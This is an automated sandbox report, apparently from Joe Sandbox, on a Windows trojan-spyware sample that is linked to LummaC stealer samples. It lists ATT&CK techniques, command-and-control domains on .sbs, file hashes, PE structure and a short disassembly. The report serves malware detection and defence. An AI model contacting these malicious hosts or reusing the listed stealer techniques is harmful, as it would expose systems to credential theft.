
              Remote Access Functionality

              barindex
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7812, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: Process Memory Space: gFCeeWNTvZ.exe PID: 7564, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              311
              Process Injection
              11
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services41
              Input Capture
              21
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              311
              Process Injection
              41
              Input Capture
              121
              Security Software Discovery
              Remote Desktop Protocol1
              Archive Collected Data
              2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Native API
              Logon Script (Windows)Logon Script (Windows)11
              Deobfuscate/Decode Files or Information
              Security Account Manager11
              Virtualization/Sandbox Evasion
              SMB/Windows Admin Shares41
              Data from Local System
              113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              PowerShell
              Login HookLogin Hook3
              Obfuscated Files or Information
              NTDS1
              Process Discovery
              Distributed Component Object Model3
              Clipboard Data
              Protocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading
              LSA Secrets1
              Peripheral Device Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              File and Directory Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem24
              System Information Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              gFCeeWNTvZ.exe8%ReversingLabs
              gFCeeWNTvZ.exe11%VirustotalBrowse
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\glfw.3927611081.dll0%ReversingLabs
              No Antivirus matches
              SourceDetectionScannerLabelLink
              rottieud.sbs0%VirustotalBrowse
              SourceDetectionScannerLabelLink
              https://rottieud.sbs/apix100%Avira URL Cloudmalware
              https://rottieud.sbs/apiDUv100%Avira URL Cloudmalware
              https://rottieud.sbs/api100%Avira URL Cloudmalware
              https://rottieud.sbs/apid1100%Avira URL Cloudmalware
              https://rottieud.sbs/ckz100%Avira URL Cloudmalware
              https://rottieud.sbs/apipf100%Avira URL Cloudmalware
              https://rottieud.sbs/g100%Avira URL Cloudmalware
              https://rottieud.sbs/&100%Avira URL Cloudmalware
              https://rottieud.sbs/apiaHD100%Avira URL Cloudmalware
              https://rottieud.sbs/api6%VirustotalBrowse
              https://rottieud.sbs/h100%Avira URL Cloudmalware
              https://rottieud.sbs/100%Avira URL Cloudmalware
              https://rottieud.sbs:443/apitPd100%Avira URL Cloudmalware
              https://rottieud.sbs/apies100%Avira URL Cloudmalware
              https://rottieud.sbs/1100%Avira URL Cloudmalware
              https://rottieud.sbs/-100%Avira URL Cloudmalware
              https://rottieud.sbs/apili100%Avira URL Cloudmalware
              https://rottieud.sbs/z100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              rottieud.sbs
              104.21.73.211
              truetrueunknown
              NameMaliciousAntivirus DetectionReputation
              rottieud.sbsfalse
                high
                tamedgeesy.sbsfalse
                  high
                  repostebhu.sbsfalse
                    high
                    thinkyyokej.sbsfalse
                      high
                      ducksringjk.sbsfalse
                        high
                        https://rottieud.sbs/apitrue
                        • 6%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        brownieyuz.sbsfalse
                          high
                          relalingj.sbsfalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://duckduckgo.com/chrome_newtabBitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://duckduckgo.com/ac/?q=BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgBitLockerToGo.exe, 00000002.00000003.1919623503.0000000004DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoBitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://rottieud.sbs/apiDUvBitLockerToGo.exe, 00000002.00000002.1984876735.0000000000AFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://rottieud.sbs/apid1BitLockerToGo.exe, 00000002.00000003.1905348168.0000000000B1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.BitLockerToGo.exe, 00000002.00000003.1919623503.0000000004DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://rottieud.sbs/apixBitLockerToGo.exe, 00000002.00000003.1949339957.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949294335.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://crl.rootca1.amazontrust.com/rootca1.crl0BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://ocsp.rootca1.amazontrust.com0:BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016BitLockerToGo.exe, 00000002.00000003.1891525862.0000000004E2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17BitLockerToGo.exe, 00000002.00000003.1891525862.0000000004E2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://rottieud.sbs/ckzBitLockerToGo.exe, 00000002.00000003.1949339957.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949294335.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://www.ecosia.org/newtab/BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://github.com/go-sql-driver/mysql/wiki/old_passwordsAgFCeeWNTvZ.exefalse
                                                      high
                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBitLockerToGo.exe, 00000002.00000003.1919119297.0000000004EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ac.ecosia.org/autocomplete?q=BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://rottieud.sbs/apipfBitLockerToGo.exe, 00000002.00000003.1953178352.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1953761551.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949408201.0000000000B25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://rottieud.sbs/gBitLockerToGo.exe, 00000002.00000003.1905348168.0000000000B1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://rottieud.sbs/&BitLockerToGo.exe, 00000002.00000002.1985066135.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1934857436.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1934926435.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1960004462.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949339957.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949294335.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1978005640.0000000000B30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://rottieud.sbs/apiaHDBitLockerToGo.exe, 00000002.00000003.1949339957.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949294335.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://rottieud.sbs/hBitLockerToGo.exe, 00000002.00000003.1960004462.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1978005640.0000000000B30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://rottieud.sbs/BitLockerToGo.exe, 00000002.00000002.1984876735.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://rottieud.sbs:443/apitPdBitLockerToGo.exe, 00000002.00000002.1985066135.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1960004462.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1978005640.0000000000B30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiBitLockerToGo.exe, 00000002.00000003.1919623503.0000000004DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://rottieud.sbs/apiesBitLockerToGo.exe, 00000002.00000003.1953761551.0000000000B25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            http://x1.c.lencr.org/0BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://x1.i.lencr.org/0BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://rottieud.sbs/1BitLockerToGo.exe, 00000002.00000002.1985066135.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://support.microsofBitLockerToGo.exe, 00000002.00000003.1891525862.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://rottieud.sbs/-BitLockerToGo.exe, 00000002.00000002.1985066135.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1934857436.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1934926435.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1960004462.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949339957.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949294335.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1978005640.0000000000B30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://support.mozilla.org/products/firefoxgro.allBitLockerToGo.exe, 00000002.00000003.1919119297.0000000004EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://rottieud.sbs/apiliBitLockerToGo.exe, 00000002.00000003.1905348168.0000000000B1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          https://rottieud.sbs/zBitLockerToGo.exe, 00000002.00000002.1985066135.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          104.21.73.211
                                                                          rottieud.sbsUnited States
                                                                          13335CLOUDFLARENETUStrue
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1553058
                                                                          Start date and time:2024-11-10 09:26:08 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 4m 44s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:5
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:gFCeeWNTvZ.exe
                                                                          renamed because original name is a hash value
                                                                          Original Sample Name:49659ec0caa7c396e5770349ce157f4ac4d2e364d1694c8588a4b9a5e905db2d.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.evad.winEXE@3/1@1/1
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HCA Information:
                                                                          • Successful, ratio: 93%
                                                                          • Number of executed functions: 35
                                                                          • Number of non-executed functions: 125
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Stop behavior analysis, all processes terminated
                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          TimeTypeDescription
                                                                          03:27:19API Interceptor8x Sleep call for process: BitLockerToGo.exe modified
                                                                          No context
                                                                          No context
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          CLOUDFLARENETUSPqSIlYOaIF.exeGet hashmaliciousLummaC, XmrigBrowse
                                                                          • 104.21.39.3
                                                                          S0ZPuRIptr.exeGet hashmaliciousLummaC, PrivateLoaderBrowse
                                                                          • 104.21.52.218
                                                                          Z8K4jt1j2H.exeGet hashmaliciousLummaCBrowse
                                                                          • 188.114.97.3
                                                                          OtherBahamas.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.32.85
                                                                          sftpc.exeGet hashmaliciousLummaCBrowse
                                                                          • 172.67.133.193
                                                                          but3.ps1Get hashmaliciousLummaCBrowse
                                                                          • 104.21.14.17
                                                                          alarmer.exeGet hashmaliciousLummaCBrowse
                                                                          • 172.67.204.91
                                                                          dIF7VJ7GTG.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.14.17
                                                                          kSBJ8j8jCy.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.39.3
                                                                          WcK7T10TPc.exeGet hashmaliciousLummaCBrowse
                                                                          • 172.67.141.179
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          a0e9f5d64349fb13191bc781f81f42e1PqSIlYOaIF.exeGet hashmaliciousLummaC, XmrigBrowse
                                                                          • 104.21.73.211
                                                                          S0ZPuRIptr.exeGet hashmaliciousLummaC, PrivateLoaderBrowse
                                                                          • 104.21.73.211
                                                                          Z8K4jt1j2H.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.73.211
                                                                          OtherBahamas.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.73.211
                                                                          sftpc.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.73.211
                                                                          but3.ps1Get hashmaliciousLummaCBrowse
                                                                          • 104.21.73.211
                                                                          alarmer.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.73.211
                                                                          dIF7VJ7GTG.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.73.211
                                                                          kSBJ8j8jCy.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.73.211
                                                                          WcK7T10TPc.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.73.211
                                                                          No context
                                                                          Process:C:\Users\user\Desktop\gFCeeWNTvZ.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1133967
                                                                          Entropy (8bit):6.2621593785107486
                                                                          Encrypted:false
                                                                          SSDEEP:12288:+a8Fde9YR/HHeL8ty/dqBHmShQqNHxhy4pDKP7BXUB:+NFbd9thHBQqNRhy4pDKtM
                                                                          MD5:4EC2D5A48D44C814F6AD68011E83A32B
                                                                          SHA1:881A6E610EF0B1DDD7BAE3C00A123C895E3DA570
                                                                          SHA-256:93CE68219CB0E920A0B9F04A38BBEFF104F530A643FD0A792215572525869F90
                                                                          SHA-512:FCA67E744FA535AE92C17AEF16DA3CA2FA58811DE0BACB97BA73E716DBDC62CAA1EE43D957E90C9FC93E6BC366EDACCD6D3FF60AE1182F1384BB0B4AE5DCCB07
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Reputation:low
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........*..b......!...".....L...$...........0....`d................................=......... ......................`.......p..x...........................................................t&...................... s...............................text...$...........................`.P`.data........0......................@.`..rdata.......@.......$..............@.`@.bss.... "...0........................`..edata.......`......................@.0@.idata..x....p......."..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B/4...................R..............@.@B/19.....c............X..............@..B/31......p.......r...n..............@..B/45..... ...........................@..B/57......>.......@..................@.0B/70......Z.......\..................@..B/81.......... .......t..
                                                                          File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Entropy (8bit):2.984665883278457
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:gFCeeWNTvZ.exe
                                                                          File size:48'627'712 bytes
                                                                          MD5:f04f7352cba3579ff18e50534f6a14d4
                                                                          SHA1:e5269c148e62f81a41cdc7144964046fdbd8fc4c
                                                                          SHA256:49659ec0caa7c396e5770349ce157f4ac4d2e364d1694c8588a4b9a5e905db2d
                                                                          SHA512:1d0fb8c5f916d0ab63bb9feef147d9ce3733b7e54c8b430e911ff83171b7465420d2c9e2746dafb15e3f1d73da8f27987d3ab625774e865613502e62e1113b0a
                                                                          SSDEEP:196608:X0N+0XdbnfS485s+VmLBWfRKjHihheroWyoJoXK:5yScbLBWfg0+J
                                                                          TLSH:70B74B40F9EB54F6DA03183444ABA2BF23347E058B25CBCBD6047F5AE837AE21937559
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...................................p........P....@.......................................@................................
                                                                          Icon Hash:92ecd292964c6cc6
                                                                          Entrypoint:0x46d270
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:6
                                                                          OS Version Minor:1
                                                                          File Version Major:6
                                                                          File Version Minor:1
                                                                          Subsystem Version Major:6
                                                                          Subsystem Version Minor:1
                                                                          Import Hash:ff9f3a86709796c17211f9df12aae74d
                                                                          Instruction
                                                                          jmp 00007F70F0E411E0h
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          mov ecx, dword ptr [esp+04h]
                                                                          sub esp, 28h
                                                                          mov dword ptr [esp+1Ch], ebx
                                                                          mov dword ptr [esp+10h], ebp
                                                                          mov dword ptr [esp+14h], esi
                                                                          mov dword ptr [esp+18h], edi
                                                                          mov esi, eax
                                                                          mov edx, dword ptr fs:[00000014h]
                                                                          cmp edx, 00000000h
                                                                          jne 00007F70F0E43519h
                                                                          mov eax, 00000000h
                                                                          jmp 00007F70F0E43576h
                                                                          mov edx, dword ptr [edx+00000000h]
                                                                          cmp edx, 00000000h
                                                                          jne 00007F70F0E43517h
                                                                          call 00007F70F0E43609h
                                                                          mov dword ptr [esp+20h], edx
                                                                          mov dword ptr [esp+24h], esp
                                                                          mov ebx, dword ptr [edx+18h]
                                                                          mov ebx, dword ptr [ebx]
                                                                          cmp edx, ebx
                                                                          je 00007F70F0E4352Ah
                                                                          mov ebp, dword ptr fs:[00000014h]
                                                                          mov dword ptr [ebp+00000000h], ebx
                                                                          mov edi, dword ptr [ebx+1Ch]
                                                                          sub edi, 28h
                                                                          mov dword ptr [edi+24h], esp
                                                                          mov esp, edi
                                                                          mov ebx, dword ptr [ecx]
                                                                          mov ecx, dword ptr [ecx+04h]
                                                                          mov dword ptr [esp], ebx
                                                                          mov dword ptr [esp+04h], ecx
                                                                          mov dword ptr [esp+08h], edx
                                                                          call esi
                                                                          mov eax, dword ptr [esp+0Ch]
                                                                          mov esp, dword ptr [esp+24h]
                                                                          mov edx, dword ptr [esp+20h]
                                                                          mov ebp, dword ptr fs:[00000014h]
                                                                          mov dword ptr [ebp+00000000h], edx
                                                                          mov edi, dword ptr [esp+18h]
                                                                          mov esi, dword ptr [esp+14h]
                                                                          mov ebp, dword ptr [esp+10h]
                                                                          mov ebx, dword ptr [esp+1Ch]
                                                                          add esp, 28h
                                                                          retn 0004h
                                                                          ret
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          mov ecx, dword ptr [esp+04h]
                                                                          mov edx, dword ptr [ecx]
                                                                          mov eax, esp
                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x10e20000x410.idata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x11500000xffb7.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x10e30000x6b06c.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0xfa90200xa8.data
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x7fe4b50x7fe60079e658fe95394aed77b248fbaf855473unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rdata0x8000000x7a4d000x7a4e007f52f05ece67ae17f71771da4418f357unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0xfa50000x13c4ac0xfb40091df303a2b0fc6fb43457cc6dc698213False0.6044397154850746data6.422139710094485IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .idata0x10e20000x4100x600e5b9fb9b83ea7d2631f7a1be3333ed95False0.3372395833333333data3.8750465305059865IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .reloc0x10e30000x6b06c0x6b2000e220ed68b79528f1ef2b5a72b088f92False0.5035507219953326data6.620939774557823IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                          .symtab0x114f0000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
